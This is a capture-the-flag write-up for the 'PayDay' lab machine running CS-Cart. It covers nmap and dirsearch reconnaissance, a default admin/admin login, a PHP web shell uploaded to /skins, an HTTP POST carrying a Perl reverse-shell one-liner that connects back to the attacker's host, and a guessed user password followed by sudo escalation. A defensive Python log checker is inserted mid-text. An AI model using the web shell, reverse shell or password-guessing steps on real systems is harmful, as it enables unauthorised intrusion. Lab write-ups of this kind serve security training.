PayDay Intermediate

nmap + dirsearch: nmap finds a web site, then dirsearch scans its directories
┌──(root㉿kali)-[/home/ftpuserr]
└─# nmap -p- -A 192.168.167.39
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 06:56 UTC
Nmap scan report for 192.168.167.39
Host is up (0.072s latency).
Not shown: 65527 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 
|   1024 f3:6e:87:04:ea:2d:b3:60:ff:42:ad:26:67:17:94:d5 (DSA)
|_  2048 bb:03:ce:ed:13:f1:9a:9e:36:03:e2:af:ca:b2:35:04 (RSA)
80/tcp  open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: CS-Cart. Powerful PHP shopping cart software
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
110/tcp open  pop3        Dovecot pop3d
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
|_pop3-capabilities: CAPA STLS SASL RESP-CODES TOP PIPELINING UIDL
|_ssl-date: 2024-11-09T06:57:54+00:00; +7s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
143/tcp open  imap        Dovecot imapd
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
|_imap-capabilities: LITERAL+ completed STARTTLS IDLE MULTIAPPEND Capability NAMESPACE IMAP4rev1 LOGIN-REFERRALS SORT LOGINDISABLEDA0001 CHILDREN UNSELECT THREAD=REFERENCES OK SASL-IR
|_ssl-date: 2024-11-09T06:57:54+00:00; +7s from scanner time.
445/tcp open  netbios-ssn Samba smbd 3.0.26a (workgroup: MSHOME)
993/tcp open  ssl/imap    Dovecot imapd
|_imap-capabilities: LITERAL+ completed IDLE MULTIAPPEND Capability NAMESPACE IMAP4rev1 LOGIN-REFERRALS SORT AUTH=PLAINA0001 CHILDREN UNSELECT THREAD=REFERENCES OK SASL-IR
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ssl-date: 2024-11-09T06:57:54+00:00; +7s from scanner time.
995/tcp open  ssl/pop3    Dovecot pop3d
|_pop3-capabilities: CAPA SASL(PLAIN) USER RESP-CODES TOP PIPELINING UIDL
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ssl-date: 2024-11-09T06:57:54+00:00; +7s from scanner time.
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.26a)
|   Computer name: payday
|   NetBIOS computer name: 
|   Domain name: 
|   FQDN: payday
|_  System time: 2024-11-09T01:57:50-05:00
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 50m06s, deviation: 2h02m28s, median: 6s
|_nbstat: NetBIOS name: PAYDAY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

TRACEROUTE (using port 53/tcp)
HOP RTT      ADDRESS
1   69.91 ms 192.168.45.1
2   69.83 ms 192.168.45.254
3   72.32 ms 192.168.251.1
4   72.42 ms 192.168.167.39

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.40 seconds

┌──(root㉿kali)-[/home/ftpuserr]
└─# dirsearch -u http://192.168.167.39/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/ftpuserr/reports/http_192.168.167.39/__24-11-09_07-00-23.txt

Target: http://192.168.167.39/

[07:00:23] Starting: 
[07:00:28] 403 -  311B  - /.ht_wsr.txt                                      
[07:00:28] 403 -  314B  - /.htaccess.orig                                   
[07:00:28] 403 -  314B  - /.htaccess.bak1                                   
[07:00:28] 403 -  316B  - /.htaccess.sample                                 
[07:00:28] 403 -  312B  - /.htaccessOLD                                     
[07:00:28] 403 -  314B  - /.htaccess_orig
[07:00:28] 403 -  312B  - /.htaccessBAK
[07:00:28] 403 -  312B  - /.htaccess_sc
[07:00:28] 403 -  315B  - /.htaccess_extra
[07:00:28] 403 -  314B  - /.htaccess.save
[07:00:28] 403 -  313B  - /.htaccessOLD2
[07:00:28] 403 -  305B  - /.html                                            
[07:00:28] 403 -  304B  - /.htm                                             
[07:00:28] 403 -  310B  - /.htpasswds                                       
[07:00:28] 403 -  314B  - /.htpasswd_test
[07:00:28] 403 -  311B  - /.httr-oauth                                      
[07:00:35] 301 -  335B  - /addons  ->  http://192.168.167.39/addons/        
[07:00:35] 200 -    2KB - /admin                                            
[07:00:35] 200 -    2KB - /admin.php
[07:00:36] 200 -    2KB - /admin/_logs/access.log                           
[07:00:36] 200 -    2KB - /admin/.config
[07:00:36] 200 -    2KB - /admin/.htaccess
[07:00:36] 200 -    2KB - /admin/%3bindex/
[07:00:36] 200 -    2KB - /admin/_logs/error.log
[07:00:36] 200 -    2KB - /admin/_logs/access-log
[07:00:36] 200 -    2KB - /admin/_logs/error-log
[07:00:36] 200 -    2KB - /admin/access.log
[07:00:36] 200 -    2KB - /admin/_logs/login.txt
[07:00:36] 200 -    2KB - /admin/
[07:00:36] 200 -    2KB - /admin/account.php
[07:00:36] 200 -    2KB - /admin/_logs/err.log
[07:00:36] 200 -    2KB - /admin/account
[07:00:36] 200 -    2KB - /admin/account.jsp
[07:00:36] 200 -    2KB - /admin/account.html
[07:00:36] 200 -    2KB - /admin/admin-login.php
[07:00:36] 200 -    2KB - /admin/account.aspx
[07:00:36] 200 -    2KB - /admin/admin-login
[07:00:36] 200 -    2KB - /admin/admin-login.aspx
[07:00:36] 200 -    2KB - /admin/account.js
[07:00:37] 200 -    2KB - /admin/admin-login.jsp
[07:00:37] 200 -    2KB - /admin/admin-login.html
[07:00:37] 200 -    2KB - /admin/admin.php
[07:00:37] 200 -    2KB - /admin/admin.aspx
[07:00:37] 200 -    2KB - /admin/admin.html
[07:00:37] 200 -    2KB - /admin/admin-login.js
[07:00:37] 200 -    2KB - /admin/admin/login
[07:00:37] 200 -    2KB - /admin/admin.jsp
[07:00:37] 200 -    2KB - /admin/admin.js
[07:00:37] 200 -    2KB - /admin/admin_login
[07:00:37] 200 -    2KB - /admin/admin_login.php
[07:00:37] 200 -    2KB - /admin/admin_login.aspx
[07:00:37] 200 -    2KB - /admin/admin_login.html
[07:00:37] 200 -    2KB - /admin/admin_login.jsp
[07:00:37] 200 -    2KB - /admin/admin_login.js
[07:00:37] 200 -    2KB - /admin/adminer.php
[07:00:37] 200 -    2KB - /admin/adminLogin
[07:00:37] 200 -    2KB - /admin/adminLogin.php
[07:00:37] 200 -    2KB - /admin/adminLogin.aspx
[07:00:37] 200 -    2KB - /admin/adminLogin.jsp
[07:00:37] 200 -    2KB - /admin/adminLogin.html
[07:00:37] 200 -    2KB - /admin/adminLogin.js
[07:00:37] 200 -    2KB - /admin/backup/
[07:00:37] 200 -    2KB - /admin/backups/
[07:00:37] 200 -    2KB - /admin/config.php
[07:00:37] 200 -    2KB - /admin/controlpanel
[07:00:37] 200 -    2KB - /admin/controlpanel.php
[07:00:37] 200 -    2KB - /admin/controlpanel.aspx
[07:00:37] 200 -    2KB - /admin/controlpanel.jsp
[07:00:37] 200 -    2KB - /admin/controlpanel.html
[07:00:37] 200 -    2KB - /admin/controlpanel.js
[07:00:37] 200 -    2KB - /admin/cp
[07:00:38] 200 -    2KB - /admin/cp.php
[07:00:38] 200 -    2KB - /admin/cp.aspx
[07:00:38] 200 -    2KB - /admin/cp.jsp
[07:00:38] 200 -    2KB - /admin/cp.html
[07:00:38] 200 -    2KB - /admin/cp.js
[07:00:38] 200 -    2KB - /admin/data/autosuggest
[07:00:38] 200 -    2KB - /admin/default
[07:00:38] 200 -    2KB - /admin/db/
[07:00:38] 200 -    2KB - /admin/default.asp
[07:00:38] 200 -    2KB - /admin/default/admin.asp
[07:00:38] 200 -    2KB - /admin/default/login.asp
[07:00:38] 200 -    2KB - /admin/download.php
[07:00:38] 200 -    2KB - /admin/dumper/
[07:00:38] 200 -    2KB - /admin/error.log
[07:00:38] 200 -    2KB - /admin/error.txt
[07:00:38] 200 -    2KB - /admin/error_log
[07:00:38] 200 -    2KB - /admin/errors.log
[07:00:38] 200 -    2KB - /admin/export.php
[07:00:38] 200 -    2KB - /admin/FCKeditor
[07:00:38] 200 -    2KB - /admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
[07:00:38] 200 -    2KB - /admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
[07:00:38] 200 -    2KB - /admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
[07:00:38] 200 -    2KB - /admin/fckeditor/editor/filemanager/connectors/asp/connector.asp
[07:00:38] 200 -    2KB - /admin/fckeditor/editor/filemanager/connectors/asp/upload.asp
[07:00:38] 200 -    2KB - /admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
[07:00:38] 200 -    2KB - /admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
[07:00:38] 200 -    2KB - /admin/fckeditor/editor/filemanager/connectors/php/connector.php
[07:00:38] 200 -    2KB - /admin/fckeditor/editor/filemanager/connectors/php/upload.php
[07:00:38] 200 -    2KB - /admin/fckeditor/editor/filemanager/upload/asp/upload.asp
[07:00:38] 200 -    2KB - /admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx
[07:00:38] 200 -    2KB - /admin/fckeditor/editor/filemanager/upload/php/upload.php
[07:00:38] 200 -    2KB - /admin/file.php
[07:00:38] 200 -    2KB - /admin/files.php
[07:00:38] 200 -    2KB - /admin/heapdump
[07:00:39] 200 -    2KB - /admin/home                                       
[07:00:39] 200 -    2KB - /admin/home.php                                   
[07:00:39] 200 -    2KB - /admin/home.aspx
[07:00:39] 200 -    2KB - /admin/home.jsp
[07:00:39] 200 -    2KB - /admin/home.html
[07:00:39] 200 -    2KB - /admin/home.js
[07:00:39] 200 -    2KB - /admin/includes/configure.php~
[07:00:39] 200 -    2KB - /admin/index
[07:00:39] 200 -    2KB - /admin/index.php
[07:00:39] 200 -    2KB - /admin/index.aspx
[07:00:39] 200 -    2KB - /admin/index.html
[07:00:39] 200 -    2KB - /admin/index.jsp
[07:00:39] 200 -    2KB - /admin/index.js
[07:00:39] 200 -    2KB - /admin/js/tiny_mce
[07:00:39] 200 -    2KB - /admin/js/tinymce                                 
[07:00:39] 200 -    2KB - /admin/js/tinymce/
[07:00:39] 200 -    2KB - /admin/js/tiny_mce/
[07:00:39] 200 -    2KB - /admin/log
[07:00:39] 200 -    2KB - /admin/log/error.log
[07:00:39] 200 -    2KB - /admin/login
[07:00:39] 200 -    2KB - /admin/login.php
[07:00:39] 200 -    2KB - /admin/login.aspx
[07:00:39] 200 -    2KB - /admin/login.jsp
[07:00:39] 200 -    2KB - /admin/login.html
[07:00:39] 200 -    2KB - /admin/login.js
[07:00:39] 200 -    2KB - /admin/login.asp
[07:00:39] 200 -    2KB - /admin/login.do
[07:00:39] 200 -    2KB - /admin/login.htm
[07:00:39] 200 -    2KB - /admin/login.py
[07:00:39] 200 -    2KB - /admin/login.rb
[07:00:39] 200 -    2KB - /admin/logon.jsp
[07:00:40] 200 -    2KB - /admin/logs/
[07:00:40] 200 -    2KB - /admin/logs/access.log
[07:00:40] 200 -    2KB - /admin/logs/access_log
[07:00:40] 200 -    2KB - /admin/logs/access-log
[07:00:40] 200 -    2KB - /admin/logs/err.log
[07:00:40] 200 -    2KB - /admin/logs/error-log
[07:00:40] 200 -    2KB - /admin/logs/error.log
[07:00:40] 200 -    2KB - /admin/logs/error_log
[07:00:40] 200 -    2KB - /admin/logs/errors.log
[07:00:40] 200 -    2KB - /admin/logs/login.txt
[07:00:40] 200 -    2KB - /admin/manage
[07:00:40] 200 -    2KB - /admin/manage.asp
[07:00:40] 200 -    2KB - /admin/manage/admin.asp
[07:00:40] 200 -    2KB - /admin/manage/login.asp
[07:00:40] 200 -    2KB - /admin/mysql/
[07:00:40] 200 -    2KB - /admin/mysql/index.php
[07:00:40] 200 -    2KB - /admin/mysql2/index.php
[07:00:40] 200 -    2KB - /admin/phpMyAdmin
[07:00:40] 200 -    2KB - /admin/phpMyAdmin/
[07:00:40] 200 -    2KB - /admin/phpmyadmin/
[07:00:40] 200 -    2KB - /admin/phpMyAdmin/index.php
[07:00:40] 200 -    2KB - /admin/phpmyadmin/index.php
[07:00:40] 200 -    2KB - /admin/pMA/
[07:00:40] 200 -    2KB - /admin/phpmyadmin2/index.php
[07:00:40] 200 -    2KB - /admin/pma/
[07:00:40] 200 -    2KB - /admin/PMA/index.php
[07:00:40] 200 -    2KB - /admin/pma/index.php
[07:00:40] 200 -    2KB - /admin/pol_log.txt
[07:00:40] 200 -    2KB - /admin/private/logs                               
[07:00:40] 200 -    2KB - /admin/portalcollect.php?f=http://xxx&t=js
[07:00:40] 200 -    2KB - /admin/release                                    
[07:00:40] 200 -    2KB - /admin/scripts/fckeditor
[07:00:40] 200 -    2KB - /admin/secure/logon.jsp                           
[07:00:40] 200 -    2KB - /admin/signin                                     
[07:00:40] 200 -    2KB - /admin/sqladmin/                                  
[07:00:41] 200 -    2KB - /admin/sxd/                                       
[07:00:41] 200 -    2KB - /admin/sysadmin/                                  
[07:00:41] 200 -    2KB - /admin/tiny_mce                                   
[07:00:41] 200 -    2KB - /admin/tinymce                                    
[07:00:41] 200 -    2KB - /admin/upload.php                                 
[07:00:41] 200 -    2KB - /admin/uploads.php                                
[07:00:41] 200 -    2KB - /admin/user_count.txt                             
[07:00:41] 200 -    2KB - /admin/views/ajax/autocomplete/user/a             
[07:00:41] 200 -    2KB - /admin/web/                                       
[07:00:41] 200 -    2KB - /admin/_logs/error_log                            
[07:00:41] 200 -    2KB - /admin/admin                                      
[07:00:41] 200 -    2KB - /admin/access.txt                                 
[07:00:41] 200 -    2KB - /admin/access_log                                 
[07:00:41] 200 -    2KB - /admin/_logs/access_log                           
[07:00:50] 301 -  336B  - /catalog  ->  http://192.168.167.39/catalog/      
[07:00:50] 403 -  308B  - /cgi-bin/                                         
[07:00:51] 301 -  336B  - /classes  ->  http://192.168.167.39/classes/      
[07:00:51] 200 -    2KB - /classes/                                         
[07:00:52] 200 -   13B  - /config                                           
[07:00:52] 200 -   13B  - /config.php                                       
[07:00:52] 200 -   13B  - /config/aws.yml                                   
[07:00:52] 200 -   13B  - /config/apc.php
[07:00:52] 200 -   13B  - /config/                                          
[07:00:52] 200 -   13B  - /config/app.php
[07:00:52] 200 -   13B  - /config/database.yml.pgsql
[07:00:52] 200 -   13B  - /config/AppData.config
[07:00:52] 200 -   13B  - /config/config.inc
[07:00:52] 200 -   13B  - /config/app.yml
[07:00:52] 200 -   13B  - /config/autoload/                                 
[07:00:52] 200 -   13B  - /config/banned_words.txt
[07:00:52] 200 -   13B  - /config/database.yml.sqlite3
[07:00:52] 200 -   13B  - /config/config.ini
[07:00:52] 200 -   13B  - /config/database.yml~
[07:00:52] 200 -   13B  - /config/db.inc
[07:00:52] 200 -   13B  - /config/master.key
[07:00:52] 200 -   13B  - /config/initializers/secret_token.rb
[07:00:52] 200 -   13B  - /config/database.yml
[07:00:52] 200 -   13B  - /config/databases.yml                             
[07:00:52] 200 -   13B  - /config/development/
[07:00:52] 200 -   13B  - /config/monkcheckout.ini
[07:00:52] 200 -   13B  - /config/monkdonate.ini
[07:00:52] 200 -   13B  - /config/monkid.ini
[07:00:52] 200 -   13B  - /config/routes.yml
[07:00:52] 200 -   13B  - /config/producao.ini
[07:00:52] 200 -   13B  - /config/settings.inc
[07:00:52] 200 -   13B  - /config/settings.ini
[07:00:52] 200 -   13B  - /config/settings.local.yml
[07:00:52] 200 -   13B  - /config/settings/production.yml
[07:00:52] 200 -   13B  - /config/settings.ini.cfm
[07:00:52] 200 -   13B  - /config/site.php
[07:00:52] 200 -   13B  - /config/xml/                                      
[07:00:53] 301 -  333B  - /core  ->  http://192.168.167.39/core/            
[07:00:56] 403 -  308B  - /doc/api/                                         
[07:00:56] 403 -  304B  - /doc/                                             
[07:00:56] 403 -  319B  - /doc/html/index.html
[07:00:56] 403 -  318B  - /doc/stable.version
[07:00:56] 403 -  319B  - /doc/en/changes.html
[07:01:01] 200 -    2KB - /image                                            
[07:01:01] 302 -    0B  - /images/  ->  ../index.php
[07:01:01] 301 -  335B  - /images  ->  http://192.168.167.39/images/        
[07:01:01] 200 -    2KB - /image.php                                        
[07:01:02] 302 -    0B  - /include/  ->  ../index.php                       
[07:01:02] 301 -  336B  - /include  ->  http://192.168.167.39/include/      
[07:01:02] 200 -   13B  - /init/                                            
[07:01:02] 200 -    8KB - /install.php                                      
[07:01:02] 200 -    8KB - /install                                          
[07:01:02] 200 -    8KB - /install.php?profile=default                      
[07:01:03] 200 -    8KB - /install/                                         
[07:01:03] 200 -    8KB - /install/update.log
[07:01:03] 200 -    8KB - /install/index.php?upgrade/                       
[07:01:11] 301 -  337B  - /payments  ->  http://192.168.167.39/payments/    
[07:01:18] 403 -  313B  - /server-status                                    
[07:01:18] 403 -  314B  - /server-status/                                   
[07:01:20] 301 -  334B  - /skins  ->  http://192.168.167.39/skins/          
[07:01:24] 200 -    1B  - /Thumbs.db                                        
[07:01:27] 301 -  332B  - /var  ->  http://192.168.167.39/var/              
[07:01:27] 302 -    0B  - /var/  ->  ../index.php                           

The /admin path is the back-end login; the default credentials admin / admin work. From there, check which framework the site runs on.


Searched for an exploit and found the matching vulnerability: https://www.exploit-db.com/exploits/48891

Upload malicious PHP code

shell.php:
<?php system($_POST[a]);phpinfo(); ?>
Get a shell by POSTing a command to the uploaded file:
POST /skins/shell.phtml HTTP/1.1
Host: 192.168.167.39
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 159
Origin: http://192.168.167.39
Connection: close
Referer: http://192.168.167.39/skins/shell.phtml
Cookie: csid=0987b3764a00652a88016ad828f35ce6; cart_languageC=EN; secondary_currencyC=usd; acsid=f3235d2078570cbfa48c5cf576165f24; cart_languageA=EN; secondary_currencyA=usd
Upgrade-Insecure-Requests: 1

a=perl%20-MIO%20-e%20'$p=fork;exit,if($p);$c=new%20IO::Socket::INET(PeerAddr,%22192.168.45.250:80%22);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_%20while<>;'
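A defender-side view of the two web-facing steps above (the dirsearch burst of 403s and the POST to the uploaded .phtml under /skins/), as an added example that is not part of this writeup or of CS-Cart: a small Python checker run over constructed Apache combined-log lines. The STATIC_DIRS and SCRIPT_EXTS lists and the "5 error responses in 10 seconds" threshold are assumed policy values, not anything the box defines.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache combined-log lines (not from the target) modelled on this
# writeup: a dirsearch burst of 403s, a benign hit, then a POST to /skins/*.phtml.
SAMPLE_LOG = """\
192.168.45.250 - - [09/Nov/2024:07:00:28 +0000] "GET /.ht_wsr.txt HTTP/1.1" 403 311 "-" "Mozilla/5.0"
192.168.45.250 - - [09/Nov/2024:07:00:28 +0000] "GET /.htaccess.orig HTTP/1.1" 403 314 "-" "Mozilla/5.0"
192.168.45.250 - - [09/Nov/2024:07:00:28 +0000] "GET /.htaccess.bak1 HTTP/1.1" 403 314 "-" "Mozilla/5.0"
192.168.45.250 - - [09/Nov/2024:07:00:29 +0000] "GET /.htpasswds HTTP/1.1" 403 310 "-" "Mozilla/5.0"
192.168.45.250 - - [09/Nov/2024:07:00:29 +0000] "GET /.httr-oauth HTTP/1.1" 403 311 "-" "Mozilla/5.0"
10.0.0.7 - - [09/Nov/2024:07:05:10 +0000] "GET /index.php HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
192.168.45.250 - - [09/Nov/2024:07:12:41 +0000] "POST /skins/shell.phtml HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+')
# Assumed policy: dirs that should only serve static assets, and extensions PHP would execute.
STATIC_DIRS = ("/skins/", "/images/", "/var/")
SCRIPT_EXTS = (".php", ".phtml", ".php3", ".phar")


def parse_line(line):
    """Return a dict for one combined-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
    d["status"] = int(d["status"])
    return d


def find_scan_bursts(entries, window_s=10, threshold=5):
    """IP -> most 403/404s seen in any window_s-second span, for IPs at/over threshold."""
    errors = defaultdict(list)
    for e in entries:
        if e["status"] in (403, 404):
            errors[e["ip"]].append(e["ts"])
    bursts = {}
    for ip, times in errors.items():
        times.sort()
        start, best = 0, 0
        for end, t in enumerate(times):          # sliding window over sorted timestamps
            while (t - times[start]).total_seconds() > window_s:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            bursts[ip] = best
    return bursts


def find_script_posts(entries):
    """(ip, path) for POSTs to script-like files under static-asset dirs."""
    hits = []
    for e in entries:
        path = e["path"].split("?", 1)[0]        # ignore any query string
        if (e["method"] == "POST" and path.startswith(STATIC_DIRS)
                and path.lower().endswith(SCRIPT_EXTS)):
            hits.append((e["ip"], path))
    return hits


def analyze(log_text):
    entries = [e for e in map(parse_line, log_text.splitlines()) if e]
    return {"scan_bursts": find_scan_bursts(entries), "script_posts": find_script_posts(entries)}
```

Note that the catch-all 200 responses for every /admin/* path in the dirsearch output above would not trip the burst check, which keys on error statuses; a catch-all route needs a separate rule keyed on request rate or identical response size.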

Get a full TTY, then escalate privileges
I was stuck here for a long time and could not work out how to escalate.
I checked the database, checked SUID binaries, checked everything, and still had nothing.
Only after reading a walkthrough did I see it:
admin:admin, customer:customer; the passwords in the database are the same as the usernames, so the blind guess is that the system password is the username too.
Log in as user partick
partick:patricke
Found that this user can run any command via sudo


Posted 2024-11-09 20:37 by WSssSW